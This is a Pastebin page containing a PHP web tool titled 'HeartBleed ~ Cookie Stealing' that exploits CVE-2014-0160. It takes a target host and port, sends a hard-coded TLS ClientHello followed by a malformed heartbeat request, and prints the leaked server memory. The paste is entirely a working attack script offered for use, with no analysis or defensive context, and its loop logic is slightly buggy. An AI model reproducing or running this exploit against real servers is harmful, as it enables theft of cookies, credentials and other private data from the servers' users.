Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE HTML>
- <html>
- <head>
- <meta http-equiv="content-type" content="text/html" />
- <title>HeartBleed ~ Cookie Stealing</title>
- <style type="text/css">
- <!--
- h1,p{margin: 3px;padding: 3px;}
- form,pre{width: 75%;border: 1px solid #ddd; margin: auto;padding: 3px;}
- input[type='text']{width: 90%; margin: 13px;padding: 3px;}
- input[type='submit']{padding: 10px; margin: 13px;}
- -->
- </style>
- </head>
- <body>
- <form action="" method="post" enctype="multipart/form-data">
- <h1>HeartBleed ~ CVE-2014-0160</h1>
- <p></p>
- <input type="text" name="host" placeholder="example.com" />
- <input type="text" name="port" value="443" placeholder="443"/>
- <input type="submit" name="submit" />
- </form>
- <br />
- <pre>
- <?php
- if(isset($_POST['submit'])) {
- $hello = "16 03 02 00 dc 01 00 00 d8 03 02 53
- 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
- bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
- 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
- 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
- c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
- c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
- c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
- c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
- 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
- 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
- 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
- 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
- 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
- 00 0f 00 01 01";
- $hb = "18 03 02 00 03 01 40 00";
- function hexbin($string) {
- $strz = explode(" ",str_replace("
- "," ",$string));
- $bin = '';
- foreach($strz as $str) {
- $bin .= chr(hexdec($str));
- }
- return $bin;
- }
- $fp = fsockopen($_POST['host'],$_POST['port'],$errno,$errstr,30);
- if(!$fp) {
- echo $errstr;
- } else {
- echo "Connecting...
- ";
- echo "Hello SSL
- ";
- fwrite($fp,hexbin($hello));
- $is_hello = true;
- $is_hb = false;
- while(!feof($fp)) {
- if($is_hello == true) {
- $buffer = fgets($fp,4096);
- $is_hello = false;
- } else {
- $buffer = fgets($fp,1024);
- if($is_hb == false) {
- echo "Sending heartbeat request...
- ";
- fwrite($fp,hexbin($hb));
- $is_hb == true;
- }
- }
- echo $buffer;
- }
- fclose($fp);
- }
- }
- ?>
- </pre>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement